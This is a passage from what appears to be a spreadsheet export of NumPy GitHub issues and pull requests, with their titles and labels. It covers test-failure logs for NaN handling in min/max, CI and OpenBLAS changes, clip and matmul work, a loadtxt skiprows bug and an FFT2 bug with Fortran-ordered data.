_______________________ TestMinMax.test_reduce_reorder _________________________x000D_
_x000D_
self = &lt;numpy.core.tests.test_umath.TestMinMax object at 0x000001EE01ECAE80&gt;_x000D_
_x000D_
    def test_reduce_reorder(self):_x000D_
        # gh 10370, 11029 Some compilers reorder the call to npy_getfloatstatus_x000D_
        # and put it before the call to an intrisic function that causes_x000D_
        # invalid status to be set. Also make sure warnings are not emitted_x000D_
        for n in (2, 4, 8, 16, 32):_x000D_
            for dt in (np.float32, np.float16, np.complex64):_x000D_
                for r in np.diagflat(np.array([np.nan] * n, dtype=dt)):_x000D_
&gt;                   assert_equal(np.min(r), np.nan)_x000D_
E                   AssertionError:_x000D_
E                   Items are not equal:_x000D_
E                    ACTUAL: 0.0_x000D_
E                    DESIRED: nan_x000D_
_x000D_
dt         = &lt;class 'numpy.float32'&gt;_x000D_
n          = 2_x000D_
r          = array([ 0., nan], dtype=float32)_x000D_
self       = &lt;numpy.core.tests.test_umath.TestMinMax object at 0x000001EE01ECAE80&gt;_x000D_
_x000D_
numpy\core\tests\test_umath.py:1341: AssertionError_x000D_
_________________ TestNanFunctions_MinMax.test_result_values ___________________x000D_
_x000D_
self = &lt;numpy.lib.tests.test_nanfunctions.TestNanFunctions_MinMax object at 0x000001EE0422BC88&gt;_x000D_
_x000D_
    def test_result_values(self):_x000D_
        for nf, rf in zip(self.nanfuncs, self.stdfuncs):_x000D_
            tgt = [rf(d) for d in _rdat]_x000D_
&gt;           res = nf(_ndat, axis=1)_x000D_
_x000D_
nf         = &lt;function nanmin at 0x000001EE78A32F28&gt;_x000D_
rf         = &lt;function amin at 0x000001EE78531D90&gt;_x000D_
self       = &lt;numpy.lib.tests.test_nanfunctions.TestNanFunctions_MinMax object at 0x000001EE0422BC88&gt;_x000D_
tgt        = [0.0116, -0.9403, -0.5954, 0.161]_x000D_
_x000D_
numpy\lib\tests\test_nanfunctions.py:83:_x000D_
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ __x000D_
_x000D_
a = array([[ 0.6244,     nan,  0.2692,  0.0116,     nan,  0.117 ],_x000D_
       [ 0.5351, -0.9403,     nan,  0.21  ,  0.4759,  0...[    nan,     nan,     nan,  0.1042,     nan, -0.5954],_x000D_
       [ 0.161 ,     nan,     nan,  0.1859,  0.3146,     nan]])_x000D_
axis = 1, out = None, keepdims = &lt;no value&gt;_x000D_
_x000D_
    @array_function_dispatch(_nanmin_dispatcher)_x000D_
    def nanmin(a, axis=None, out=None, keepdims=np._NoValue):_x000D_
        """_x000D_
        Return minimum of an array or minimum along an axis, ignoring any NaNs._x000D_
        When all-NaN slices are encountered a ``RuntimeWarning`` is raised and_x000D_
        Nan is returned for that slice._x000D_
_x000D_
        Parameters_x000D_
        ----------_x000D_
        a : array_like_x000D_
            Array containing numbers whose minimum is desired. If `a` is not an_x000D_
            array, a conversion is attempted._x000D_
        axis : {int, tuple of int, None}, optional_x000D_
            Axis or axes along which the minimum is computed. The default is to compute_x000D_
            the minimum of the flattened array._x000D_
        out : ndarray, optional_x000D_
            Alternate output array in which to place the result.  The default_x000D_
            is ``None``; if provided, it must have the same shape as the_x000D_
            expected output, but the type will be cast if necessary.  See_x000D_
            `doc.ufuncs` for details._x000D_
_x000D_
            .. versionadded:: 1.8.0_x000D_
        keepdims : bool, optional_x000D_
            If this is set to True, the axes which are reduced are left_x000D_
            in the result as dimensions with size one. With this option,_x000D_
            the result will broadcast correctly against the original `a`._x000D_
_x000D_
            If the value is anything but the default, then_x000D_
            `keepdims` will be passed through to the `min` method_x000D_
            of sub-classes of `ndarray`.  If the sub-classes methods_x000D_
            does not implement `keepdims` any exceptions will be raised._x000D_
_x000D_
            .. versionadded:: 1.8.0_x000D_
_x000D_
        Returns_x000D_
        -------_x000D_
        nanmin : ndarray_x000D_
            An array with the same shape as `a`, with the specified axis_x000D_
            removed.  If `a` is a 0-d array, or if axis is None, an ndarray_x000D_
            scalar is returned.  The same dtype as `a` is returned._x000D_
_x000D_
        See Also_x000D_
        --------_x000D_
        nanmax :_x000D_
            The maximum value of an array along a given axis, ignoring any NaNs._x000D_
        amin :_x000D_
            The minimum value of an array along a given axis, propagating any NaNs._x000D_
        fmin :_x000D_
            Element-wise minimum of two arrays, ignoring any NaNs._x000D_
        minimum :_x000D_
            Element-wise minimum of two arrays, propagating any NaNs._x000D_
        isnan :_x000D_
            Shows which elements are Not a Number (NaN)._x000D_
        isfinite:_x000D_
            Shows which elements are neither NaN nor infinity._x000D_
_x000D_
        amax, fmax, maximum_x000D_
_x000D_
        Notes_x000D_
        -----_x000D_
        NumPy uses the IEEE Standard for Binary Floating-Point for Arithmetic_x000D_
        (IEEE 754). This means that Not a Number is not equivalent to infinity._x000D_
        Positive infinity is treated as a very large number and negative_x000D_
        infinity is treated as a very small (i.e. negative) number._x000D_
_x000D_
        If the input has a integer type the function is equivalent to np.min._x000D_
_x000D_
        Examples_x000D_
        --------_x000D_
        &gt;&gt;&gt; a = np.array([[1, 2], [3, np.nan]])_x000D_
        &gt;&gt;&gt; np.nanmin(a)_x000D_
        1.0_x000D_
        &gt;&gt;&gt; np.nanmin(a, axis=0)_x000D_
        array([ 1.,  2.])_x000D_
        &gt;&gt;&gt; np.nanmin(a, axis=1)_x000D_
        array([ 1.,  3.])_x000D_
_x000D_
        When positive infinity and negative infinity are present:_x000D_
_x000D_
        &gt;&gt;&gt; np.nanmin([1, 2, np.nan, np.inf])_x000D_
        1.0_x000D_
        &gt;&gt;&gt; np.nanmin([1, 2, np.nan, np.NINF])_x000D_
        -inf_x000D_
_x000D_
        """_x000D_
        kwargs = {}_x000D_
        if keepdims is not np._NoValue:_x000D_
            kwargs['keepdims'] = keepdims_x000D_
        if type(a) is np.ndarray and a.dtype != np.object_:_x000D_
            # Fast, but not safe for subclasses of ndarray, or object arrays,_x000D_
            # which do not implement isnan (gh-9009), or fmin correctly (gh-8975)_x000D_
            res = np.fmin.reduce(a, axis=axis, out=out, **kwargs)_x000D_
            if np.isnan(res).any():_x000D_
&gt;               warnings.warn("All-NaN slice encountered", RuntimeWarning, stacklevel=2)_x000D_
E               RuntimeWarning: All-NaN slice encountered_x000D_
_x000D_
a          = array([[ 0.6244,     nan,  0.2692,  0.0116,     nan,  0.117 ],_x000D_
       [ 0.5351, -0.9403,     nan,  0.21  ,  0.4759,  0...[    nan,     nan,     nan,  0.1042,     nan, -0.5954],_x000D_
       [ 0.161 ,     nan,     nan,  0.1859,  0.3146,     nan]])_x000D_
axis       = 1_x000D_
keepdims   = &lt;no value&gt;_x000D_
kwargs     = {}_x000D_
out        = None_x000D_
res        = array([ 0.0116, -0.9403,     nan,  0.161 ])_x000D_
_x000D_
numpy\lib\nanfunctions.py:294: RuntimeWarning_x000D_
_____________________ TestNanFunctions_MinMax.test_masked ______________________x000D_
_x000D_
self = &lt;numpy.lib.tests.test_nanfunctions.TestNanFunctions_MinMax object at 0x000001EE04713240&gt;_x000D_
_x000D_
    def test_masked(self):_x000D_
        mat = np.ma.fix_invalid(_ndat)_x000D_
        msk = mat._mask.copy()_x000D_
        for f in [np.nanmin]:_x000D_
            res = f(mat, axis=1)_x000D_
&gt;           tgt = f(_ndat, axis=1)_x000D_
_x000D_
f          = &lt;function nanmin at 0x000001EE78A32F28&gt;_x000D_
mat        = masked_array(_x000D_
  data=[[0.6244, --, 0.2692, 0.0116, --, 0.117],_x000D_
        [0.5351, -0.9403, --, 0.21, 0.4759, 0.2833],_x000D_
  ...   [ True,  True,  True, False,  True, False],_x000D_
        [False,  True,  True, False, False,  True]],_x000D_
  fill_value=1e+20)_x000D_
msk        = array([[False,  True, False, False,  True, False],_x000D_
       [False, False,  True, False, False, False],_x000D_
       [ True,  True,  True, False,  True, False],_x000D_
       [False,  True,  True, False, False,  True]])_x000D_
res        = masked_array(data=[0.0116, -0.9403, -0.5954, 0.161],_x000D_
             mask=[False, False, False, False],_x000D_
       fill_value=1e+20)_x000D_
self       = &lt;numpy.lib.tests.test_nanfunctions.TestNanFunctions_MinMax object at 0x000001EE04713240&gt;_x000D_
_x000D_
numpy\lib\tests\test_nanfunctions.py:107:_x000D_
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ __x000D_
_x000D_
a = array([[ 0.6244,     nan,  0.2692,  0.0116,     nan,  0.117 ],_x000D_
       [ 0.5351, -0.9403,     nan,  0.21  ,  0.4759,  0...[    nan,     nan,     nan,  0.1042,     nan, -0.5954],_x000D_
       [ 0.161 ,     nan,     nan,  0.1859,  0.3146,     nan]])_x000D_
axis = 1, out = None, keepdims = &lt;no value&gt;_x000D_
_x000D_
    @array_function_dispatch(_nanmin_dispatcher)_x000D_
    def nanmin(a, axis=None, out=None, keepdims=np._NoValue):_x000D_
        """_x000D_
        Return minimum of an array or minimum along an axis, ignoring any NaNs._x000D_
        When all-NaN slices are encountered a ``RuntimeWarning`` is raised and_x000D_
        Nan is returned for that slice._x000D_
_x000D_
        Parameters_x000D_
        ----------_x000D_
        a : array_like_x000D_
            Array containing numbers whose minimum is desired. If `a` is not an_x000D_
            array, a conversion is attempted._x000D_
        axis : {int, tuple of int, None}, optional_x000D_
            Axis or axes along which the minimum is computed. The default is to compute_x000D_
            the minimum of the flattened array._x000D_
        out : ndarray, optional_x000D_
            Alternate output array in which to place the result.  The default_x000D_
            is ``None``; if provided, it must have the same shape as the_x000D_
            expected output, but the type will be cast if necessary.  See_x000D_
            `doc.ufuncs` for details._x000D_
_x000D_
            .. versionadded:: 1.8.0_x000D_
        keepdims : bool, optional_x000D_
            If this is set to True, the axes which are reduced are left_x000D_
            in the result as dimensions with size one. With this option,_x000D_
            the result will broadcast correctly against the original `a`._x000D_
_x000D_
            If the value is anything but the default, then_x000D_
            `keepdims` will be passed through to the `min` method_x000D_
            of sub-classes of `ndarray`.  If the sub-classes methods_x000D_
            does not implement `keepdims` any exceptions will be raised._x000D_
_x000D_
            .. versionadded:: 1.8.0_x000D_
_x000D_
        Returns_x000D_
        -------_x000D_
        nanmin : ndarray_x000D_
            An array with the same shape as `a`, with the specified axis_x000D_
            removed.  If `a` is a 0-d array, or if axis is None, an ndarray_x000D_
            scalar is returned.  The same dtype as `a` is returned._x000D_
_x000D_
        See Also_x000D_
        --------_x000D_
        nanmax :_x000D_
            The maximum value of an array along a given axis, ignoring any NaNs._x000D_
        amin :_x000D_
            The minimum value of an array along a given axis, propagating any NaNs._x000D_
        fmin :_x000D_
            Element-wise minimum of two arrays, ignoring any NaNs._x000D_
        minimum :_x000D_
            Element-wise minimum of two arrays, propagating any NaNs._x000D_
        isnan :_x000D_
            Shows which elements are Not a Number (NaN)._x000D_
        isfinite:_x000D_
            Shows which elements are neither NaN nor infinity._x000D_
_x000D_
        amax, fmax, maximum_x000D_
_x000D_
        Notes_x000D_
        -----_x000D_
        NumPy uses the IEEE Standard for Binary Floating-Point for Arithmetic_x000D_
        (IEEE 754). This means that Not a Number is not equivalent to infinity._x000D_
        Positive infinity is treated as a very large number and negative_x000D_
        infinity is treated as a very small (i.e. negative) number._x000D_
_x000D_
        If the input has a integer type the function is equivalent to np.min._x000D_
_x000D_
        Examples_x000D_
        --------_x000D_
        &gt;&gt;&gt; a = np.array([[1, 2], [3, np.nan]])_x000D_
        &gt;&gt;&gt; np.nanmin(a)_x000D_
        1.0_x000D_
        &gt;&gt;&gt; np.nanmin(a, axis=0)_x000D_
        array([ 1.,  2.])_x000D_
        &gt;&gt;&gt; np.nanmin(a, axis=1)_x000D_
        array([ 1.,  3.])_x000D_
_x000D_
        When positive infinity and negative infinity are present:_x000D_
_x000D_
        &gt;&gt;&gt; np.nanmin([1, 2, np.nan, np.inf])_x000D_
        1.0_x000D_
        &gt;&gt;&gt; np.nanmin([1, 2, np.nan, np.NINF])_x000D_
        -inf_x000D_
_x000D_
        """_x000D_
        kwargs = {}_x000D_
        if keepdims is not np._NoValue:_x000D_
            kwargs['keepdims'] = keepdims_x000D_
        if type(a) is np.ndarray and a.dtype != np.object_:_x000D_
            # Fast, but not safe for subclasses of ndarray, or object arrays,_x000D_
            # which do not implement isnan (gh-9009), or fmin correctly (gh-8975)_x000D_
            res = np.fmin.reduce(a, axis=axis, out=out, **kwargs)_x000D_
            if np.isnan(res).any():_x000D_
&gt;               warnings.warn("All-NaN slice encountered", RuntimeWarning, stacklevel=2)_x000D_
E               RuntimeWarning: All-NaN slice encountered_x000D_
_x000D_
a          = array([[ 0.6244,     nan,  0.2692,  0.0116,     nan,  0.117 ],_x000D_
       [ 0.5351, -0.9403,     nan,  0.21  ,  0.4759,  0...[    nan,     nan,     nan,  0.1042,     nan, -0.5954],_x000D_
       [ 0.161 ,     nan,     nan,  0.1859,  0.3146,     nan]])_x000D_
axis       = 1_x000D_
keepdims   = &lt;no value&gt;_x000D_
kwargs     = {}_x000D_
out        = None_x000D_
res        = array([ 0.0116, -0.9403,     nan,  0.161 ])_x000D_
_x000D_
numpy\lib\nanfunctions.py:294: RuntimeWarning_x000D_
8 failed, 6718 passed, 354 skipped, 167 deselected, 10 xfailed in 175.58 seconds_x000D_
```_x000D_
&lt;/details&gt;_x000D_
_x000D_
Minimal repro:_x000D_
_x000D_
```python_x000D_
&gt;&gt;&gt; np.maximum(0, np.nan)_x000D_
0   # my machine_x000D_
nan  # everywhere else_x000D_
```</t>
  </si>
  <si>
    <t>1.16 maintenance branch fails tests on MSVC 2015 (VS2015 update 2)</t>
  </si>
  <si>
    <t>['00 - Bug', '06 - Regression', '26 - Compiler']</t>
  </si>
  <si>
    <t xml:space="preserve">This includes:_x000D_
* The addition of 3-input PyObject inner loop_x000D_
* The removal of `-&gt;f-&gt;fastclip` for builtin types, which now use ufuncs instead_x000D_
* A deprecation in `PyArray_Clip` for third-party types that still use `-&gt;f-&gt;fastclip`_x000D_
* A deprecation of the unusual casting behavior of `clip`_x000D_
* A deprecation of the broken `nan`-behavior of `clip`, which was previously dependent on dimensionality and byte-order._x000D_
* **new:** A behavior change for `max &lt; min` which brings object arrays in line with the other types_x000D_
_x000D_
Surprisingly, this actually seems to have better performance (N=10000):_x000D_
```python_x000D_
In [1]: a = np.arange(10000, dtype=float)_x000D_
In [2]: a2 = np.empty(a.shape, dtype=[('a', a.dtype), ('b', np.bool)])['a']_x000D_
In [3]: a2[...] = a_x000D_
_x000D_
In [4]: %timeit np.clip(a, 0, 1)_x000D_
20.3 µs ± 206 ns per loop (mean ± std. dev. of 7 runs, 100000 loops each)_x000D_
_x000D_
In [5]: %timeit np.core.umath.clip(a, 0, 1)_x000D_
16.9 µs ± 1.37 µs per loop (mean ± std. dev. of 7 runs, 100000 loops each)_x000D_
_x000D_
In [6]: %timeit np.clip(a2, 0, 1)_x000D_
65.7 µs ± 1.11 µs per loop (mean ± std. dev. of 7 runs, 10000 loops each)_x000D_
_x000D_
In [7]: %timeit np.core.umath.clip(a2, 0, 1)_x000D_
62.6 µs ± 970 ns per loop (mean ± std. dev. of 7 runs, 10000 loops each)_x000D_
```_x000D_
_x000D_
Edit: those performance numbers are probably not representative of the wrapped call - there is a big cost to pay for the deprecations._x000D_
</t>
  </si>
  <si>
    <t>ENH/DEP: Use a ufunc under the hood for ndarray.clip</t>
  </si>
  <si>
    <t>['01 - Enhancement', '03 - Maintenance', '07 - Deprecation', 'component: numpy.core']</t>
  </si>
  <si>
    <t>Expanded `.gitignore` to include results of expansion of new `core/common/*.h.src` files, as well as `core/src/umath/matmul.[ch]`.</t>
  </si>
  <si>
    <t>added template-generated files to .gitignore</t>
  </si>
  <si>
    <t>The copy-loops shouldn't assert pointer alignment for size-0 arrays, especially when `RELAXED_STRIDES` is turned on._x000D_
_x000D_
Fixes #12503</t>
  </si>
  <si>
    <t>BUG: don't check alignment of size=0 arrays (RELAXED_STRIDES)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- Please describe the issue in detail here, and fill in the fields below --&gt;_x000D_
See #12398 for details of test failures when compiled with defined `__AVX2__`._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>AVX2 related failures.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- Please be sure you are following the instructions in the dev guidelines_x000D_
http://www.numpy.org/devdocs/dev/gitwash/development_workflow.html_x000D_
--&gt;_x000D_
 MAINT: Prepare master for 1.17.0 development._x000D_
    _x000D_
- Create 1.17.0-notes_x000D_
- Update index.rst for new notes_x000D_
- Update pavement.py_x000D_
- Update setup.py_x000D_
- Remove Python 2.7 and 3.4 CI testing._x000D_
- Add `# cython: language_level=3` to `*.pxd`, `*.pyx` files._x000D_
    _x000D_
Note that this removes support for both Python2.7 and Python3.4 in_x000D_
setup.py._x000D_
_x000D_
_x000D_
&lt;!-- We'd appreciate it if your commit message is properly formatted_x000D_
http://www.numpy.org/devdocs/dev/gitwash/development_workflow.html#writing-the-commit-message_x000D_
--&gt;_x000D_
</t>
  </si>
  <si>
    <t>MAINT: Prepare master for 1.17.0 development.</t>
  </si>
  <si>
    <t>['03 - Maintenance', '04 - Documentation', '14 - Release']</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- Please describe the issue in detail here, and fill in the fields below --&gt;_x000D_
Unable to make documentation with_x000D_
```_x000D_
make dist_x000D_
```_x000D_
fails with_x000D_
```_x000D_
Traceback (most recent call last):_x000D_
  File "/home/charris/.local/bin/sphinx-build", line 7, in &lt;module&gt;_x000D_
    from sphinx.cmd.build import main_x000D_
ModuleNotFoundError: No module named 'sphinx'_x000D_
```_x000D_
_x000D_
I can do the import without problems from a console, so suspect some sort of path problem has crept into my environment.  There haven't been any recent updates to the Makefile._x000D_
_x000D_
@rgommers Could you check if you can still make the documentation? That's why the new issue :)_x000D_
</t>
  </si>
  <si>
    <t>Problem building docs</t>
  </si>
  <si>
    <t>Fixes #12298 by using proper string variable substitutions or just hard-coding for "single-matrix" runs (mac, linux have a single job). Also, reduce ambiguity with respect to architecture and fast / full test runs. _x000D_
_x000D_
The Azure `PublishTestResults` task was not able to substitute Python version strings so we're seeing reports like this for merge event CI runs:_x000D_
![image](https://user-images.githubusercontent.com/7903078/49667751-d4b73f80-fa10-11e8-8ab0-c43868f24ef1.png)_x000D_
_x000D_
For pull request CI runs it currently looks more like this:_x000D_
![image](https://user-images.githubusercontent.com/7903078/49667810-0fb97300-fa11-11e8-97c2-b6cd426e02cf.png)_x000D_
_x000D_
The 6 missing publication entries for PR runs are all for Windows, and @charris has already [noted](https://github.com/numpy/numpy/pull/12498#issuecomment-445063962) the Warnings on the test publication task for Windows. In fact, there are 12 such warnings on PRs (2 per windows job), and 6 such warnings for merge events (1 per Windows job)._x000D_
_x000D_
My objective here is to deal with the simple linked issue first -- get those version strings working sensibly, and then look at the deeper issues on `PublishTestResults` Windows warnings after that._x000D_
_x000D_
On my branch, the changes in this PR produce this:_x000D_
![image](https://user-images.githubusercontent.com/7903078/49668058-dcc3af00-fa11-11e8-92af-814e64e7b4e9.png)_x000D_
_x000D_
And hopefully works similar for master branch PR here.</t>
  </si>
  <si>
    <t>TST: Azure Python version fix</t>
  </si>
  <si>
    <t xml:space="preserve">resolves #12500_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>MAINT: removed word/typo from comment in site.cfg.example</t>
  </si>
  <si>
    <t xml:space="preserve">Bump the version of openblas used in Azure Windows CI runs to match [the current state of NumPy wheels](https://github.com/MacPython/numpy-wheels/commit/5b34866fd3e5c7953dec6352e07f285c471ac4c3)._x000D_
_x000D_
I spot-checked the test results for 2 Windows matrix entries for this branch on my fork and they looked identical to master._x000D_
</t>
  </si>
  <si>
    <t>TST: sync Azure Win openblas</t>
  </si>
  <si>
    <t>Fixes #12156. _x000D_
_x000D_
- Test added for 0-strided vector array_x000D_
- Fixed new matmul logic to detect this condition by adding logic from assert inside `@typ@_gemv` to checks before calling `@typ@_gemv_x000D_
- Fixed old dot logic to check for this condition in helper function_x000D_
- Verified (by using gdb) that `gemv` is used where possible in `matmul`, and that copying is done as necessary in `dot`</t>
  </si>
  <si>
    <t>BUG: test, fix matmul, dot for vector array with stride[i]=0</t>
  </si>
  <si>
    <t>As [noted](https://github.com/numpy/numpy/pull/12253#discussion_r239262077) we probably shouldn't have things like `matplotlib.use('agg')` in our docs. I added several such cases in #12253 -- I think my main reason was related to issues of:_x000D_
_x000D_
1) having matplotlib plots showing (popping) up on my screen locally during doctests because of backend settings / whatever defaults get used with our original docstrings_x000D_
2) Actual doctest errors, at least locally, without using a fixed backend_x000D_
_x000D_
I'm not sure if the issues are less severe after the doctest-&gt;refguide transition now.</t>
  </si>
  <si>
    <t>DOC, TST: matplotlib backends in doctests</t>
  </si>
  <si>
    <t>Since comments in loadtxt can already be used to skip comments in data file, why would skiprows also count comments? That doesn't seem useful and in my case is less than useless since number of comments can vary but number of data lines I want to skip doesn't._x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
```_x000D_
&gt;&gt;&gt; from io import StringIO_x000D_
&gt;&gt;&gt; from numpy import loadtxt_x000D_
&gt;&gt;&gt; f=StringIO("# 1 2\n2 3\n4 5\n")_x000D_
&gt;&gt;&gt; loadtxt(f, skiprows=0)_x000D_
array([[2., 3.],_x000D_
       [4., 5.]])_x000D_
&gt;&gt;&gt; f=StringIO("# 1 2\n2 3\n4 5\n")_x000D_
&gt;&gt;&gt; loadtxt(f, skiprows=1)_x000D_
array([[2., 3.],_x000D_
       [4., 5.]])_x000D_
&gt;&gt;&gt; f=StringIO("# 1 2\n2 3\n4 5\n")_x000D_
&gt;&gt;&gt; loadtxt(f, skiprows=2)_x000D_
array([4., 5.])_x000D_
```_x000D_
_x000D_
Result above is identical with skiprows=0 and skiprows=1 which seems inconsistent..._x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
&gt;&gt;&gt; import sys, numpy; print(numpy.__version__, sys.version)_x000D_
_x000D_
1.14.5 3.6.7 (default, Nov 23 2018, 12:11:28) _x000D_
[GCC 8.2.1 20181105 (Red Hat 8.2.1-5)]</t>
  </si>
  <si>
    <t>BUG: skiprows in loadtxt counts comments</t>
  </si>
  <si>
    <t>Fixes #12482</t>
  </si>
  <si>
    <t>ENH: implement matmul on NDArrayOperatorsMixin</t>
  </si>
  <si>
    <t>DOC: Update copyright year in the license</t>
  </si>
  <si>
    <t>The matmul docstring in `numpy/core/code_generators/ufunc_docstrings.py` fails the refguide check in #12253 for a variety of reasons varying from behavior changes to not even closing brackets in `np.array()` declarations._x000D_
_x000D_
While I've cleaned up some of the trivial issues, I'm going to mark the rest of the issues in that docstring with the `SKIP` directive and I suggest that they be fixed **after** that PR is merged so that the fixes are properly verified in CI._x000D_
_x000D_
I'll probably continue with this approach moving forward until the doctest PR is merged -- adding SKIPs and opening bookmark issues--otherwise I end up as the "human refguide checker" for doc changes.</t>
  </si>
  <si>
    <t>DOC, TST: matmul docstring fails refguide</t>
  </si>
  <si>
    <t>`np.matmul` is now a ufunc (thanks to #12219), so we can support it with NDArrayOperatorsMixin now -- these lines in the docstring are now out of date!_x000D_
https://github.com/numpy/numpy/blob/82428bb72589c6fd781689feb1f501a6a29c6fdc/numpy/lib/mixins.py#L72-L73_x000D_
_x000D_
This isn't a strict blocker for 1.16 but it would be good to get it in if possible.</t>
  </si>
  <si>
    <t>Update NDArrayOperatorsMixin to implement __matmul__ using np.matmul</t>
  </si>
  <si>
    <t>['01 - Enhancement', 'component: numpy.lib', 'good first issue', 'priority: high']</t>
  </si>
  <si>
    <t>We have planned to support Python 2.7 and &gt;=3.5 for the 1.16 release.</t>
  </si>
  <si>
    <t>Remove Python 3.4, 2.7 from setup.py</t>
  </si>
  <si>
    <t xml:space="preserve">OpenBLAS 3.4 has been released: https://github.com/xianyi/OpenBLAS/releases._x000D_
_x000D_
@matthew-brett, @tylerjereddy We need to try building the library for testing. What would be the best way to go about that? When that is done, and if the tests pass, then we can close #12394_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Build OpenBLAS 3.4.</t>
  </si>
  <si>
    <t>PR #12402 will remove the `noprefix.h` header file. Notify users already in 1.16 that this will happen in 1.17</t>
  </si>
  <si>
    <t>DEP: promise to remove a file in 1.17</t>
  </si>
  <si>
    <t>['04 - Documentation', '07 - Deprecation']</t>
  </si>
  <si>
    <t>Activate `NUMPY_EXPERIMENTAL_ARRAY_FUNCTION=1` for our singular full test suite coverage job._x000D_
_x000D_
Based on feedback from @shoyer, we probably want to have this flag enabled as the exception rather than the rule, so this is only the second case in all our CI matrices where the flag is activated._x000D_
_x000D_
A reviewer should notice that less tests are skipped if this flag is working properly vs. current master for the coverage job in Travis.</t>
  </si>
  <si>
    <t>TST: enable dispatcher test coverage</t>
  </si>
  <si>
    <t xml:space="preserve">Fixes gh-12379_x000D_
_x000D_
This doesn't support overrides in `np.arange()` (since it's less clear that makes sense)_x000D_
_x000D_
Note that potentially we should wait until https://github.com/numpy/numpy/pull/12388 goes in before merging this._x000D_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</si>
  <si>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override support for np.linspace and friends</t>
  </si>
  <si>
    <t>['01 - Enhancement', 'component: __array_function__']</t>
  </si>
  <si>
    <t xml:space="preserve">The original motivation for the style of these wrapper functions, introduced_x000D_
in gh-12175, was to preserve introspection. But it turns out NumPy's functions_x000D_
defined in C don't support introspection anyways, so the extra wrapper_x000D_
functions are entirely pointless._x000D_
_x000D_
This version reverts the additional wrapper functions, which put default_x000D_
arguments in two places and introduced slow-down due to the overhead of_x000D_
another function call._x000D_
_x000D_
I've retained docstrings in multiarray.py, since it's definitely more readable_x000D_
to keep docstrings and dispatchers together rather than leaving docstrings in_x000D_
_add_newdocs.py._x000D_
_x000D_
One bonus of this approach is that dispatcher functions have the same name_x000D_
as their implementations, so `np.concatenate(unknown=True)` gives an_x000D_
error message mentioning "concatenate" rather than "_concatenate_dispatcher":_x000D_
`TypeError: concatenate() got an unexpected keyword argument 'unknown'`_x000D_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</si>
  <si>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remove wrapper functions from numpy.core.multiarray</t>
  </si>
  <si>
    <t>Add `openblas` library to NumPy Windows Azure CI builds, based largely on our wheels appveyor config &amp; recent efforts to do [something similar](https://github.com/scipy/scipy/pull/9542/) for SciPy._x000D_
_x000D_
This should hopefully reduce dissonance between development and wheels CI, albeit not perfectly, but at least a step in that direction._x000D_
_x000D_
I spot-checked the results for one of the Windows cases vs. current master and results looked the same modulo now detecting `openblas` in distutils output. Good if a reviewer double-checks that consistency for one or two matrix entries.</t>
  </si>
  <si>
    <t>TST: use openblas for Windows CI</t>
  </si>
  <si>
    <t>This should give an empty result, not an error.  The problem was that the empty list was interpreted as a list of strings._x000D_
_x000D_
Found by astropy testing (https://github.com/astropy/astropy/issues/8199)_x000D_
_x000D_
Would be good to include in 1.16.0...</t>
  </si>
  <si>
    <t>BUG: IndexError for empty list on structured MaskedArray.</t>
  </si>
  <si>
    <t xml:space="preserve">Closes #12267._x000D_
_x000D_
Say that the input arrays of `numpy.equal` and `numpy.not_equal` can be of different shapes if they can be broadcast to a common shape._x000D_
</t>
  </si>
  <si>
    <t>DOC: fix docstrings for broadcastable inputs in ufunc</t>
  </si>
  <si>
    <t>I started making dtype classes so that the type(np.dtype('int32')) is no longer numpy.dtype rather a new numpy.int_type type that inherits from numpy.dtype, the first step in the [plan to refactor dtypes](https://hackmd.io/cVdS9UyBRayZF-tIW1lC0g?both). Rather than a single large PR, I will try to do this in a set of smaller PRs, with an "opt-out" `#ifdef USE_DTYPE_AS_PYOBJECT... #else ... #endif` around the code._x000D_
_x000D_
This actually creates the classes, where PR #12430 is working toward separating `arrarydescr_new` into  `tp_new`, `tp_init` to make subclassing more correct._x000D_
_x000D_
This is still a WIP. The next step will be to explore if it is possible to use these new types to implement one of the use cases via subclassing.</t>
  </si>
  <si>
    <t>WIP: ENH: make dtypes a PyTypeObject</t>
  </si>
  <si>
    <t xml:space="preserve">FFT2 produces incorrect results for Fortran ordered 3D data_x000D_
_x000D_
### Example_x000D_
_x000D_
```python_x000D_
&gt;&gt;&gt; import numpy as np_x000D_
&gt;&gt;&gt; rng = np.random.RandomState(42)_x000D_
&gt;&gt;&gt; X_c = rng.rand(1024, 1024, 1).astype(np.complex128)_x000D_
&gt;&gt;&gt; X_f = X_c.astype(X_c.dtype, order='F')_x000D_
_x000D_
&gt;&gt;&gt; np.abs(np.fft.fft2(X_c, axes=(0, 1))).max()_x000D_
524563.6580112983  # expected (correct) value_x000D_
&gt;&gt;&gt; np.abs(np.fft.fft2(X_f, axes=(0, 1))).max()_x000D_
8.430870870125293e+295 # incorrect value for Fortran ordered data_x000D_
&gt;&gt;&gt; np.abs(np.fft.fft2(X_f[:, :, 0], axes=(0, 1))).max()_x000D_
524563.6580112983  # passing a 2D slice,  Fortran ordered works._x000D_
```_x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
Python 3.6, Linux, numpy 1.15.4  (from the default conda channel)._x000D_
_x000D_
This particular example works as expected with `fft2` from scipy 1.1.0._x000D_
_x000D_
I'm not sure if https://github.com/numpy/numpy/pull/11888 would help with this._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>FFT2 incorrect results for Fortran ordered 3D data</t>
  </si>
  <si>
    <t xml:space="preserve">In microbenchmarks which measured TSC cycles for SSE2, AVX2 and AVX512_x000D_
versions of the sqrt function, AVX2 and AVX512 showed a 1.99x and 3.6x_x000D_
performance improvement over SSE2. The experiments were performed on_x000D_
Intel(R) Core(TM) i9-7900X CPU @ 3.30GHz. Detailed numbers are listed_x000D_
below:_x000D_
_x000D_
| Arraysize | Speed up with AVX2 | Speed up with AVX512 |_x000D_
|-----------|--------------------|----------------------|_x000D_
| 5000      | 1.99173            | 3.76                 |_x000D_
| 20000     | 1.99784            | 3.69                 |_x000D_
